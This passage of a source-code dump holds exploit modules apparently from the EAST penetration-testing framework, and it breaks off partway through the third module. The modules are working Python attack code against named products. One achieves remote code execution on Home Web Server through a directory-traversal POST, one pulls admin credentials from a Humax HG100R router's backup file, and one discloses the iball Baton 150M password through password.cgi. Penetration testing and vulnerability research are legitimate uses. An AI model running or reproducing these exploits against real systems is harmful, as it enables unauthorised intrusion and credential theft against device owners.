/usr/bin/env python 2 | # -*- coding: utf_8 -*- 3 | # The exploit is a part of EAST Framework - use only under the license agreement specified in LICENSE.txt in your EAST Framework distribution 4 | 5 | import sys 6 | import socket 7 | 8 | sys.path.append("./core") 9 | from Sploit import Sploit 10 | 11 | INFO = {} 12 | INFO['NAME'] = "efa_home_web_server_rce" 13 | INFO['DESCRIPTION'] = "Home Web Server 1.9.1 build 164 - Remote Code Execution" 14 | INFO['VENDOR'] = "http://downstairs.dnsalias.net/" 15 | INFO['DOWNLOAD_LINK'] = 'https://www.exploit-db.com/apps/6713ded59ae078c0539cc93cec5e102d-HomeWebServerInstall.exe' 16 | INFO['LINKS'] = ['https://www.exploit-db.com/exploits/42128/'] 17 | INFO["CVE Name"] = "" 18 | INFO["NOTES"] = """ 19 | Home Web Server allows to call cgi programs via POST which are located into /cgi-bin folder. However by using a directory traversal, it is possible to run any executable being on the remote host. 20 | """ 21 | INFO['CHANGELOG'] = "06 Jun 2017. Written by Gleg team." 
22 | INFO['PATH'] = 'Exploits/General/' 23 | 24 | # Must be in every module, to be set by framework 25 | OPTIONS = {} 26 | OPTIONS["HOST"] = "127.0.0.1" 27 | OPTIONS["PORT"] = "80" 28 | OPTIONS["CMD"] = 'Windows/system32/calc.exe' 29 | 30 | class exploit(Sploit): 31 | def __init__(self, host = "", port = 0, logger = None): 32 | Sploit.__init__(self, logger = logger) 33 | self.name = INFO['NAME'] 34 | self.cmd = OPTIONS['CMD'] 35 | self.host = host 36 | self.port = port 37 | 38 | def args(self): 39 | self.args = Sploit.args(self, OPTIONS) 40 | self.host = self.args.get('HOST', self.host) 41 | self.port = int(self.args.get('PORT', self.port)) 42 | self.cmd = self.args.get('CMD', self.cmd) 43 | 44 | def run(self): 45 | self.args() 46 | 47 | packet = 'POST /cgi-bin/../../../../../../../../{} HTTP/1.1\r\n\r\n'.format(self.cmd) 48 | 49 | try: 50 | s = socket.socket() 51 | s.connect((self.host, self.port)) 52 | s.sendall(packet) 53 | self.log(s.recv(4096).strip()) 54 | s.close() 55 | except Exception as e: 56 | self.log(e) 57 | self.finish(False) 58 | 59 | self.log('Success!') 60 | self.finish(True) 61 | 62 | if __name__ == '__main__': 63 | """ 64 | By now we only have the tool mode for exploit.. 65 | Later we would have standalone mode also. 66 | """ 67 | print "Running exploit %s .. " % INFO['NAME'] 68 | e = exploit("192.168.0.1", 80) 69 | e.run() -------------------------------------------------------------------------------- /exploits/efa_humax_hg100r_cd.py: -------------------------------------------------------------------------------- 1 | #! 
/usr/bin/env python 2 | # -*- coding: utf_8 -*- 3 | # The exploit is a part of EAST Framework - use only under the license agreement specified in LICENSE.txt in your EAST Framework distribution 4 | 5 | import sys 6 | import urllib2 7 | import base64 8 | import struct 9 | 10 | sys.path.append("./core") 11 | from Sploit import Sploit 12 | 13 | INFO = {} 14 | INFO['NAME'] = "efa_humax_hg100r_cd" 15 | INFO['DESCRIPTION'] = "Humax HG100R 2.0.6 - Backup File Download" 16 | INFO['VENDOR'] = "http://humaxdigital.com" 17 | INFO['DOWNLOAD_LINK'] = '' 18 | INFO['LINKS'] = ['https://www.exploit-db.com/exploits/42284/'] 19 | INFO["CVE Name"] = "" 20 | INFO["NOTES"] = """Humax HG100R backup file download""" 21 | 22 | INFO['CHANGELOG'] = "03 Jul, 2017. Written by Gleg team." 23 | INFO['PATH'] = 'Exploits/Hardware/' 24 | 25 | # Must be in every module, to be set by framework 26 | OPTIONS = {} 27 | OPTIONS["HOST"] = "127.0.0.1", dict(description = 'Target IP') 28 | OPTIONS["PORT"] = 80, dict(description = 'Target port') 29 | #OPTIONS["COMMAND"] = '', dict(description = 'Command') 30 | 31 | class exploit(Sploit): 32 | def __init__(self, host="", port=0, logger=None): 33 | Sploit.__init__(self, logger = logger) 34 | self.name = INFO['NAME'] 35 | self.port = port 36 | self.host = host 37 | # self.command = "" 38 | 39 | def args(self): 40 | self.args = Sploit.args(self, OPTIONS) 41 | self.host = self.args.get('HOST', self.host) 42 | self.port = int(self.args.get('PORT', self.port)) 43 | # self.command = self.args.get('COMMAND', self.command) 44 | 45 | 46 | def make_url(self, path = ''): 47 | return 'http://{}:{}{}'.format(self.host, self.port, path) 48 | 49 | def run(self): 50 | self.args() 51 | 52 | url = self.make_url('/view/basic/GatewaySettings.bin') 53 | try: 54 | fd = urllib2.urlopen(url) 55 | content = fd.read() 56 | except Exception as e: 57 | self.log(e) 58 | self.finish(False) 59 | 60 | result = base64.b64decode(content[96:]).decode('ascii','ignore').replace('^@','') 61 | 
second = result.split('admin')[1] 62 | lpass = int(struct.unpack('>h', second[:2])[0]) 63 | 64 | self.log('Found credentials: admin:' + second[2:lpass + 2]) 65 | self.log('Config file saved to OUTPUT directory') 66 | self.writefile(result) 67 | 68 | self.finish(True) 69 | 70 | if __name__ == '__main__': 71 | """ 72 | By now we only have the tool mode for exploit.. 73 | Later we would have standalone mode also. 74 | """ 75 | print "Running exploit %s .. " % INFO['NAME'] 76 | e = exploit("192.168.0.1", 80) 77 | e.run() 78 | 79 | -------------------------------------------------------------------------------- /exploits/efa_iball_batton_150m_cd.py: -------------------------------------------------------------------------------- 1 | #! /usr/bin/env python 2 | # -*- coding: utf_8 -*- 3 | # The exploit is a part of EAST Framework - use only under the license agreement specified in LICENSE.txt in your EAST Framework distribution 4 | 5 | import sys 6 | import urllib2 7 | from time import sleep 8 | 9 | sys.path.append("./core") 10 | from Sploit import Sploit 11 | 12 | INFO = {} 13 | INFO['NAME'] = "efa_iball_batton_150m_cd" 14 | INFO['DESCRIPTION'] = "iball Baton 150M Password Disclosure" 15 | INFO['VENDOR'] = "http://www.iball.co.in" 16 | INFO['DOWNLOAD_LINK'] = '' 17 | INFO['LINKS'] = ['https://packetstormsecurity.com/files/141522/iball-Baton-150M-Password-Disclosure.html'] 18 | INFO["CVE Name"] = "" 19 | INFO["NOTES"] = """iball Baton 150M Router's login page is insecurely developed that any attacker could bypass the admin's authentication just by tweaking the password.cgi file. 20 | Firmware Version : 1.2.6 build 110401 Rel.47776n 21 | Hardware Version : iB-WRA150N v1 00000001 22 | """ 23 | 24 | INFO['CHANGELOG'] = "10 Mar, 2017. Written by Gleg team." 
25 | INFO['PATH'] = 'Exploits/Hardware/' 26 | 27 | # Must be in every module, to be set by framework 28 | OPTIONS = {} 29 | OPTIONS["HOST"] = "172.20.174.1", dict(description = 'Target IP') 30 | OPTIONS["PORT"] = 80, dict(description = 'Target port') 31 | 32 | class exploit(Sploit): 33 | def __init__(self, host="", port=0, logger=None): 34 | Sploit.__init__(self, logger = logger) 35 | self.name = INFO['NAME'] 36 | self.port = port 37 | self.host = host 38 | 39 | def args(self): 40 | self.args = Sploit.args(self, OPTIONS) 41 | self.host = self.args.get('HOST', self.host) 42 | self.port = int(self.args.get('PORT', self.port)) 43 | 44 | 45 | def make_url(self, path = ''): 46 | return 'http://{}:{}{}'.format(self.host, self.port, path) 47 | 48 | def run(self): 49 | self.args() 50 | 51 | url = self.make_url('/password.cgi') 52 | try: 53 | fd = urllib2.urlopen(url) 54 | source = fd.read() 55 | result = source.split('